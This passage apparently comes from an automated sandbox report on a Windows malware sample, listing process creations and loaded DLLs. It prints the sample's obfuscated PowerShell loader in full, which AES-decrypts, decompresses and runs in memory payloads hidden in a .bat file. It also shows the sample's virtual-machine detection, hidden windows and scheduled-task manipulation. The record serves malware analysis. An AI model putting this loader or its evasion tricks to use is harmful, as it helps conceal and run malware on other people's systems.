Flags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
